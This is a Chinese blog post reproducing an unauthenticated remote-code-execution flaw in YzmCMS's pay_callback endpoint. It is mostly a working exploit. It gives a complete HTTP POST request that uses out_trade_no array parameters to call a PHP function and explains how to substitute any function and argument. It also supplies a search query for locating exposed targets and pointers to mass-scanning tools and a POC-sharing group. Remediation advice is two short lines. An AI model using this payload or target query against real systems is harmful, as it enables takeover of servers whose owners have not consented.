【漏洞复现】YzmCMS pay_callback 远程命令执行

已于 2024-07-01 23:26:12 修改
阅读量156 收藏 1
点赞数 6
分类专栏: 漏洞复现篇 文章标签: YzmCMS RCE
于 2024-07-01 23:14:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/140112191
版权

0x01 产品简介

YzmCMS是一款基于YZMPHP开发的一套轻量级开源内容管理系统,YzmCMS简洁、安全、开源、免费,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业、个人站长快速建站提供解决方案。

0x02 漏洞概述

YzmCMS /pay/index/pay_callback.html接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统指令,写入后门文件,最终可获取服务器权限。

0x03 搜索引擎

app="yzmcms"

在这里插入图片描述

0x04 漏洞复现

POST /pay/index/pay_callback.html HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
 
out_trade_no[0]=eq&out_trade_no[1]=1&out_trade_no[2]=phpinfo

PS: out_trade_no[2]处为调用的php函数,out_trade_no[1]处为函数的值

在这里插入图片描述
RCE
在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

关闭互联网暴露面或接口设置访问权限
升级至安全版本

SuperherRo
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
YzmCMS pay_callback 远程命令执行漏洞
0xSec
04-30 755
YzmCMS /pay/index/pay_callback.html接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统指令,写入后门文件,最终可获取服务器权限。
漏洞YzmCMS pay_callback.html存在远程命令执行漏洞
失心少年
05-02 286
YzmCMS /pay_callback.html接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统命令
漏洞YzmCMS-远程命令执行-pay_callback
知黑而守白
06-19 39
YZMCMS是一款轻量级、高效且开源的内容管理系统,它基于PHP+Mysql架构,采用自主研发的YZMPHP框架和MVC模式进行开发。该系统具有卓越的跨平台性能,能够稳定运行在Linux、Windows、MacOSX、Solaris等多种操作系统上。YzmCMS pay_callback 接口处存在远程命令执行漏洞,恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。
0day-YzmCMS-callback-命令执行漏洞
weixin_43167326的博客
04-30 1071
YZMCMS是一款轻量级、高效且开源的内容管理系统,它基于PHP+Mysql架构,采用自主研发的YZMPHP框架和MVC模式进行开发。该系统具有卓越的跨平台性能,能够稳定运行在Linux、Windows、MacOSX、Solaris等多种操作系统上。YZMCMS的代码简洁且严谨,几乎无冗余,确保了系统的高效运行和快速加载。同时,它支持模块化开发设计,使得二次开发变得简单而容易。此外,该系统还内置了多种安全机制,如密码加密和防注入等,以保障网站的安全稳定。
YzmCMS 7.0任意函数调用RCE 漏洞研究分析
shelter1234567的博客
05-07 845
YzmCMS是一款基于YZMPHP开发的一套轻量级开源内容管理系统,YzmCMS简洁、安全、开源、免费,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业、个人站长快速建站提供解决方案。YzmCMS某些接口调用了 db_pdo类的where方法 导致了远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统指令,写入后门文件,最终可获取服务器权限。
cms[172.168.20.114] 漏洞
小同的博客
04-01 362
1.信息收集 简单信息收集IP:172.168.20.114 端口:8080 中间件:apache shiro 2.具体步骤 1.抓包工具:Burp suite 发漏洞:反序列化漏洞 2.使用apache-shior漏洞探测工具扫描 第一步:爆破密钥 第二步:查看是否有回显 第三步:进行注入 反序列化工具地址:https://github.com/j1anFen/shiro_attack 下载步骤 第四步:使用刚才选择的连接工具:我这里是中国...
YzmCMS跨站脚本漏洞(CVE-2020-22394)
锋刃科技的博客
11-28 4630
简介 YzmCMS基于 PHP 的轻量级开源内容管理系统。 漏洞概述 YzmCMS v5.5版本存在跨站脚本漏洞,该漏洞源于编辑器中的member contribution function包含一个跨站点脚本(XSS)漏洞。 影响版本 YzmCMS v5.5 环境搭建 到官网下载源码 https://www.yzmcms.com/ 好像官网最近访问不了了,放个百度网盘的 https://pan.baidu.com/s/1y8_4FrGlUUrV0-LaGWJhWA 安装完成后 .
php preg_replace()漏洞记录
Sea_Sand息禅
03-19 2022
先介绍一下preg_replace()函数: 摘自W3school 定义和用法: array_walk() 函数对数组中的每个元素应用用户自定义函数。在函数中,数组的键名和键值是参数。 注释:您可以通过把用户自定义函数中的第一个参数指定为引用:&$value,来改变数组元素的值 语法 array_walk(array,myfunction,userdata...) 参数 描述 ar...
preg_replace_callback() 函数
冷月醉雪的博客
04-21 3672
查看更多 https://www.yuque.com/docs/share/08a815a8-dffe-4c64-a26a-2ae2fd389aa7
crypto_callback等三个动态库.zip
01-12
crypto.dll、crypto_callback.dll、otp_test_engine.dll,解决emqx start运行无反应问题,下载后解压缩,替换D:\emqx\lib\crypto-4.7\priv\lib下的原来的文件即可解决问题
flutter_screenshot_callback:flutter_screenshot_callback
03-05
screenshot_callback 一个新的Flutter插件。入门该项目是Flutter的起点,Flutter是一个特殊的程序包,其中包括针对Android和/或iOS的平台特定的实代码。 要获得Flutter入门方面的帮助,请查看我们的,其中提供了...
Activity_Callback.rar_Callback android_activity Callback_android
09-19
android的callback自己看看吧
php中preg_replace_callback函数简单用法示例
12-19
mixed preg_replace_callback ( mixed pattern, callback callback, mixed subject [, int limit] ) 本函数的行为几乎和 preg_replace() 一样,除了不是提供一个 replacement 参数,而是指定一个 callback 函数。该...
enumerate_callback.rar_callback
09-23
How to implement Windows CallBack with using delphi
CCD式铆合测定机保养说明书.doc
最新发布
06-30
CCD式铆合测定机保养说明书
IOS操作系统开发/调试的案例
06-29
IOS操作系统开发/调试的案例 iOS操作系统开发和调试是一个杂但非常有趣的过程。下面是一个简单的iOS应用开发案例,展示了如何使用Swift和Xcode开发一个基本的iOS应用,并进行调试。
【精美排版】基于STCC单片机的简易电子琴.doc
06-30
单片机
【精品】毕业设计:单片机模拟交通灯设计.doc
06-30
单片机
g_usif_queue = xQueueCreate(10, sizeof(D_MsgData)); d_ble_register_callback(ble_user_callback); d_sensor_data_register_callback(sensor_data_user_callback); d_timer_register_callback(timer_user_callback); d_uart_register_callback(uart_user_callback, LOOKUP_STR_OK, LOOKUP_STR_ERR, LOOKUP_STR_NEW_MSG, CAN_SEND_DATA_2_IOT); d_iot_timeout_timer_register_callback(iot_timeout_timer_user_callback); d_acc_gpiote_interrupt_disable(); d_lcd_display_str(D_LCD_DISPLAY_STR_BOOT, 0); d_led_light_on(D_LED_LIGHT_RED); nrf_delay_us(5000000); d_led_light_off(D_LED_LIGHT_RED); d_led_uninit(); d_alarm_off(); d_acc_gpiote_interrupt_enable(); d_power_register_callback(power_off_user_callback); d_acc_register_callback(acc_user_callback); d_lcd_clean(); xTaskCreate(d_usif_task, "d_usif_task", 256*3, g_usif_queue, 2, &xHandle_usif_task); configASSERT( xHandle_usif_task ); d_sensor_data_send_start(); d_uart_clear_data_buf();
07-25
这段代码包含了一系列函数调用和任务创建,用于初始化设备并启动相关功能。下面是每个函数调用的简要解释: 1. `xQueueCreate(10, sizeof(D_MsgData))`:创建一个队列 `g_usif_queue`,队列大小为 10,每个元素大小为 `D_MsgData` 的字节大小。 2. `d_ble_register_callback(ble_user_callback)`:注册 BLE 回调函数 `ble_user_callback`。 3. `d_sensor_data_register_callback(sensor_data_user_callback)`:注册传感器数据回调函数 `sensor_data_user_callback`。 4. `d_timer_register_callback(timer_user_callback)`:注册定时器回调函数 `timer_user_callback`。 5. `d_uart_register_callback(uart_user_callback, LOOKUP_STR_OK, LOOKUP_STR_ERR, LOOKUP_STR_NEW_MSG, CAN_SEND_DATA_2_IOT)`:注册 UART 回调函数 `uart_user_callback`,并传递一些字符串参数。 6. `d_iot_timeout_timer_register_callback(iot_timeout_timer_user_callback)`:注册物联网超时定时器回调函数 `iot_timeout_timer_user_callback`。 7. `d_acc_gpiote_interrupt_disable()`:禁用加速度计 GPIO 中断。 8. `d_lcd_display_str(D_LCD_DISPLAY_STR_BOOT, 0)`:在 LCD 上显示启动信息。 9. `d_led_light_on(D_LED_LIGHT_RED)`:点亮红色 LED 灯。 10. `nrf_delay_us(5000000)`:延迟 5000000 微秒(5秒)。 11. `d_led_light_off(D_LED_LIGHT_RED)`:关闭红色 LED 灯。 12. `d_led_uninit()`:关闭 LED 灯。 13. `d_alarm_off()`:关闭报警功能。 14. `d_acc_gpiote_interrupt_enable()`:启用加速度计 GPIO 中断。 15. `d_power_register_callback(power_off_user_callback)`:注册电源关闭回调函数 `power_off_user_callback`。 16. `d_acc_register_callback(acc_user_callback)`:注册加速度计回调函数 `acc_user_callback`。 17. `d_lcd_clean()`:清空 LCD 屏幕。 18. `xTaskCreate(d_usif_task, "d_usif_task", 256*3, g_usif_queue, 2, &xHandle_usif_task)`:创建一个任务 `d_usif_task`,任务名为 "d_usif_task",任务栈大小为 256*3 字节,传递 `g_usif_queue` 给任务作为参数,优先级为 2,并将任务句柄保存在 `xHandle_usif_task` 中。 19. `configASSERT(xHandle_usif_task)`:确保任务创建成功。 20. `d_sensor_data_send_start()`:启动传感器数据发送。 21. `d_uart_clear_data_buf()`:清空 UART 数据缓冲区。 综上所述,这段代码的作用是初始化设备和相关功能,并创建一个名为 "d_usif_task" 的任务。具体的实细节可能需要参考相关函数的定义和文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值